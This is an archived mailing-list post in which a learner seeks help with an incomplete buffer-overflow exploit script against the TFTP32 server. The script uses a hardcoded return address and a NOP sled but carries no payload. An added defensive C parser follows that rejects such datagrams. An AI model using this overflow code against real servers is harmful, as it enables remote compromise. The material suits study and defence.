Vulnerability Development mailing list archives
Help needed in TFTP32v1.3 BO
From: wong yu liang <yuliang11 () yahoo com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)
Hi all,

I'm new to buffer overflows. I've gone through some basic examples in buffer overflow; now I'm trying to write my own exploit based on this software. Basically, I found this Perl script somewhere on the net. It takes 264 bytes to overflow, with 4 extra bytes for the EIP. I'm using call esp, #0x77e2d9d3 advapi32.dll WinXP SP2 for the RET, and I found that I'm still 4 bytes off when I dump the ESP register in OllyDbg. I've seen some examples on the net like "add esp 10, ret 4", but I'm not sure what it means. Hope someone can enlighten me on this.

Thanks

use IO::Socket;

$host = "10.10.10.2"; #Target IP here
$port = "69";         #Target Port Here. TFTP uses udp 69

#0x77e2d9d3 advapi32.dll
$shellcode="\xd3\xd9\xe2\x77";
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS 136

$buf ="\x00\x02";
$buf .= "\x41" x 264;
$buf .= $shellcode;

#Print size of buffer
print "Length: ", length($buf), "\n";

#Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp") or die "Cannot Create Socket: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

#Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf) or die "Cannot Send Buffer: $!\n";
print "All Done\n";
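A defensive counterpart to the datagram built above, as an added example that is not part of the original post and not TFTP32's code: a bounds-checked parser for RFC 1350 read/write requests (opcode, filename, NUL, mode, NUL) that rejects the packet shapes this script produces before any filename is copied. The function names, the 256-byte name buffer, the 8-byte mode limit, and treating the bytes after the opcode as the filename field are assumptions of the example; the sample packets are constructed filler of the same length and contain no return address or payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 1350 request: opcode(2 bytes) | filename | 0 | mode | 0 */
enum { TFTP_RRQ = 1, TFTP_WRQ = 2, MODE_MAX = 8 /* strlen("netascii") */ };
enum verdict { REQ_OK, NOT_A_REQUEST, TRUNCATED, NAME_UNTERMINATED,
               NAME_BAD_LENGTH, MODE_INVALID };

/* Length of the NUL-terminated field starting at p, or -1 if no NUL
 * occurs before end. Never reads past the received datagram. */
static long field_len(const uint8_t *p, const uint8_t *end) {
    const uint8_t *nul = memchr(p, 0, (size_t)(end - p));
    return nul ? (long)(nul - p) : -1;
}

/* Validate a request; the filename is copied into name[cap] only after
 * its length has been checked against cap (hypothetical helper). */
enum verdict check_request(const uint8_t *pkt, size_t len, char *name, size_t cap) {
    if (len < 4) return TRUNCATED;
    unsigned op = ((unsigned)pkt[0] << 8) | pkt[1];
    if (op != TFTP_RRQ && op != TFTP_WRQ) return NOT_A_REQUEST;
    const uint8_t *p = pkt + 2, *end = pkt + len;
    long n = field_len(p, end);
    if (n < 0) return NAME_UNTERMINATED;
    if (n == 0 || (size_t)n >= cap) return NAME_BAD_LENGTH;
    long m = field_len(p + n + 1, end);
    if (m <= 0 || m > MODE_MAX) return MODE_INVALID;
    memcpy(name, p, (size_t)n + 1);          /* includes the NUL */
    return REQ_OK;
}

/* Constructed sample: WRQ whose filename is `fill` bytes of 'A'; with
 * terminate != 0 a well-formed "\0octet\0" tail is appended. */
size_t make_wrq(uint8_t *out, size_t fill, int terminate) {
    out[0] = 0; out[1] = TFTP_WRQ;
    memset(out + 2, 'A', fill);
    if (!terminate) return 2 + fill;
    memcpy(out + 2 + fill, "\0octet", 7);    /* NUL + "octet" + NUL */
    return 2 + fill + 7;
}

int main(void) {
    uint8_t pkt[512]; char name[256];
    printf("%d\n", check_request(pkt, make_wrq(pkt, 404, 0), name, sizeof name));
    printf("%d\n", check_request(pkt, make_wrq(pkt, 264, 1), name, sizeof name));
    printf("%d\n", check_request(pkt, make_wrq(pkt, 8, 1), name, sizeof name));
    return 0;
}
```

The first call models the 406-byte datagram the script sends (2-byte opcode plus 404 bytes with no NUL anywhere), the second a terminated 264-byte name, and the third a well-formed request.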